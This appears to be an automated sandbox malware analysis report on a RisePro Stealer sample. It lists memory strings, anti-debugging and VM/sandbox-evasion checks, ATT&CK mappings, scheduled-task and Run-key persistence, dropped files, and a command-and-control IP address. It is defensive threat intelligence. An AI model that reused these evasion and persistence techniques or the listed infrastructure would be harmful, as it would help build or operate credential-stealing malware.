            Source: MPGPH131.exe, 00000005.00000002.4147850074.00000000011E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
            Source: MPGPH131.exe, 00000006.00000002.4147764213.000000000169B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}GT:/
            Source: RageMP131.exe, 0000000B.00000002.4148456840.00000000009FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}H
            Source: RageMP131.exe, 00000007.00000002.4148390163.0000000000F9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_8C381D4C
            Source: RageMP131.exe, 0000000B.00000003.1948086057.0000000000F93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: MPGPH131.exe, 00000006.00000002.4147764213.000000000169B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
            Source: RageMP131.exe, 0000000B.00000002.4148938152.0000000000F93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}@
            Source: MPGPH131.exe, 00000006.00000002.4147764213.000000000169B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000& T:H
            Source: LisectAVT_2403002A_140.exe, 00000000.00000002.4147804202.0000000001869000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: MPGPH131.exe, 00000006.00000002.4147764213.000000000169B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}:R
            Source: RageMP131.exe, 00000007.00000002.4148390163.0000000000FA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}y
            Source: MPGPH131.exe, 00000006.00000002.4147764213.00000000016C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_8C381D4C
            Source: RageMP131.exe, 0000000B.00000002.4148938152.0000000000F6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&c
            Source: RageMP131.exe, 0000000B.00000003.1948086057.0000000000F91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: RageMP131.exe, 0000000B.00000002.4148938152.0000000000F6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}t
            Source: LisectAVT_2403002A_140.exe, 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000005.00000002.4145995268.0000000000CE5000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmp, RageMP131.exe, 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: RageMP131.exe, 00000007.00000002.4148390163.0000000000FA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}x
            Source: LisectAVT_2403002A_140.exe, 00000000.00000002.4147804202.0000000001854000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000005.00000002.4147850074.00000000011E2000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000007.00000002.4148390163.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000B.00000002.4148938152.0000000000F6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: RageMP131.exe, 00000007.00000002.4148390163.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000gz
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_058900F1 Start: 05890149 End: 0589014D0_2_058900F1
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_05060337 Start: 050604A3 End: 050603465_2_05060337
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_05060277 Start: 050604A3 End: 050603405_2_05060277
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_0506027E Start: 050604A3 End: 050603405_2_0506027E
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_050602AA Start: 050604A3 End: 050603405_2_050602AA
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_050602BD Start: 050604A3 End: 050603405_2_050602BD
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_050602C3 Start: 050604A3 End: 050603405_2_050602C3
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_05060AC3 Start: 05060B17 End: 05060AE65_2_05060AC3
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_050E0A5D Start: 050E0BAB End: 050E0B5E7_2_050E0A5D
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_050E0ED2 Start: 050E0F55 End: 050E0E9D7_2_050E0ED2
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: NTICE
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: SICE
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_058809E9 rdtsc 0_2_058809E9
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00D83A40 mov eax, dword ptr fs:[00000030h]0_2_00D83A40
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00D83A40 mov eax, dword ptr fs:[00000030h]0_2_00D83A40
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00D34100 mov eax, dword ptr fs:[00000030h]0_2_00D34100
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00A83A40 mov eax, dword ptr fs:[00000030h]5_2_00A83A40
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00A83A40 mov eax, dword ptr fs:[00000030h]5_2_00A83A40
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 5_2_00A34100 mov eax, dword ptr fs:[00000030h]5_2_00A34100
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A83A40 mov eax, dword ptr fs:[00000030h]6_2_00A83A40
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A83A40 mov eax, dword ptr fs:[00000030h]6_2_00A83A40
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A34100 mov eax, dword ptr fs:[00000030h]6_2_00A34100
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_00323A40 mov eax, dword ptr fs:[00000030h]7_2_00323A40
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_00323A40 mov eax, dword ptr fs:[00000030h]7_2_00323A40
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 7_2_002D4100 mov eax, dword ptr fs:[00000030h]7_2_002D4100
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_00323A40 mov eax, dword ptr fs:[00000030h]11_2_00323A40
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_00323A40 mov eax, dword ptr fs:[00000030h]11_2_00323A40
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 11_2_002D4100 mov eax, dword ptr fs:[00000030h]11_2_002D4100
            Source: LisectAVT_2403002A_140.exe, LisectAVT_2403002A_140.exe, 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmp, RageMP131.exe, RageMP131.exe, 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: 8Program Manager
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeCode function: 0_2_00DFF26A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00DFF26A
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1709813394.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.1856862638.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.1935348315.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.1776987778.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.1776201948.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_140.exe PID: 5440, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 7348, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 7356, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 7644, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 8008, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1709813394.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.1856862638.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.1935348315.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.1776987778.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.1776201948.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_140.exe PID: 5440, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 7348, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 7356, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 7644, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 8008, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
            Command and Scripting Interpreter
            1
            Scheduled Task/Job
            2
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job
            1
            Registry Run Keys / Startup Folder
            1
            Scheduled Task/Job
            24
            Virtualization/Sandbox Evasion
            LSASS Memory641
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Registry Run Keys / Startup Folder
            2
            Process Injection
            Security Account Manager24
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            NTDS2
            Process Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
            Software Packing
            Cached Domain Credentials214
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1482502 Sample: LisectAVT_2403002A_140.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 36 Antivirus / Scanner detection for submitted sample 2->36 38 Yara detected RisePro Stealer 2->38 40 Machine Learning detection for sample 2->40 42 3 other signatures 2->42 7 LisectAVT_2403002A_140.exe 1 9 2->7         started        12 RageMP131.exe 2 2->12         started        14 MPGPH131.exe 2 2->14         started        16 2 other processes 2->16 process3 dnsIp4 34 193.233.132.74, 49730, 49731, 49732 FREE-NET-ASFREEnetEU Russian Federation 7->34 26 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 7->26 dropped 28 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 7->28 dropped 30 C:\Users\...\RageMP131.exe:Zone.Identifier, ASCII 7->30 dropped 32 C:\...\MPGPH131.exe:Zone.Identifier, ASCII 7->32 dropped 44 Detected unpacking (changes PE section rights) 7->44 46 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 7->46 48 Uses schtasks.exe or at.exe to add and modify task schedules 7->48 50 Tries to detect virtualization through RDTSC time measurements 7->50 18 schtasks.exe 1 7->18         started        20 schtasks.exe 1 7->20         started        52 Antivirus detection for dropped file 12->52 54 Tries to detect sandboxes and other dynamic analysis tools (window names) 12->54 56 Machine Learning detection for dropped file 12->56 58 Tries to evade debugger and weak emulator (self modifying code) 14->58 60 Hides threads from debuggers 14->60 62 Potentially malicious time measurement code found 14->62 64 Tries to detect sandboxes / dynamic malware analysis system (registry check) 16->64 66 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->66 file5 signatures6 process7 process8 22 conhost.exe 18->22         started        24 conhost.exe 20->24         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            LisectAVT_2403002A_140.exe100%AviraTR/Redcap.dchmo
            LisectAVT_2403002A_140.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe100%AviraTR/Redcap.dchmo
            C:\ProgramData\MPGPH131\MPGPH131.exe100%AviraTR/Redcap.dchmo
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe100%Joe Sandbox ML
            C:\ProgramData\MPGPH131\MPGPH131.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.winimage.com/zLibDll0%URL Reputationsafe
            https://t.me/RiseProSUPPORT0%Avira URL Cloudsafe
            https://t.me/RiseProSUPPORTR0%Avira URL Cloudsafe
            https://t.me/RiseProSUPPORT;0%Avira URL Cloudsafe
            https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll0%Avira URL Cloudsafe
            No contacted domains info
            NameSourceMaliciousAntivirus DetectionReputation
            https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dllLisectAVT_2403002A_140.exe, 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002A_140.exe, 00000000.00000003.1709813394.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000005.00000003.1776201948.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.1776987778.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, RageMP131.exe, 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 00000007.00000003.1856862638.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 0000000B.00000003.1935348315.0000000004B80000.00000004.00001000.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.winimage.com/zLibDllLisectAVT_2403002A_140.exe, 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002A_140.exe, 00000000.00000003.1709813394.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000005.00000003.1776201948.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.1776987778.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, RageMP131.exe, 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 00000007.00000003.1856862638.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 0000000B.00000003.1935348315.0000000004B80000.00000004.00001000.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://t.me/RiseProSUPPORTLisectAVT_2403002A_140.exe, 00000000.00000002.4147804202.000000000181E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000005.00000002.4147850074.00000000011AD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.4147764213.000000000169B000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000007.00000002.4148390163.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000B.00000002.4148938152.0000000000F6D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://t.me/RiseProSUPPORTRRageMP131.exe, 0000000B.00000002.4148938152.0000000000F6D000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://t.me/RiseProSUPPORT;RageMP131.exe, 00000007.00000002.4148390163.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            193.233.132.74
            unknownRussian Federation
            2895FREE-NET-ASFREEnetEUtrue
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1482502
            Start date and time:2024-07-25 23:53:17 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 11m 16s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:13
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:LisectAVT_2403002A_140.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@11/5@0/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • VT rate limit hit for: LisectAVT_2403002A_140.exe
            TimeTypeDescription
            17:54:39API Interceptor3588580x Sleep call for process: LisectAVT_2403002A_140.exe modified
            17:54:46API Interceptor5531x Sleep call for process: MPGPH131.exe modified
            17:54:54API Interceptor4822923x Sleep call for process: RageMP131.exe modified
            22:54:15Task SchedulerRun new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
            22:54:15Task SchedulerRun new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
            22:54:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
            22:54:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            193.233.132.74LisectAVT_2403002A_163.exeGet hashmaliciousRisePro StealerBrowse
              LisectAVT_2403002A_185.exeGet hashmaliciousRisePro StealerBrowse
                LisectAVT_2403002A_218.exeGet hashmaliciousRisePro StealerBrowse
                  LisectAVT_2403002A_228.exeGet hashmaliciousRisePro StealerBrowse
                    LisectAVT_2403002A_376.exeGet hashmaliciousRisePro StealerBrowse
                      LisectAVT_2403002B_242.exeGet hashmaliciousRisePro StealerBrowse
                        LisectAVT_2403002A_224.exeGet hashmaliciousRisePro StealerBrowse
                          80OrFCsz0u.exeGet hashmaliciousGCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
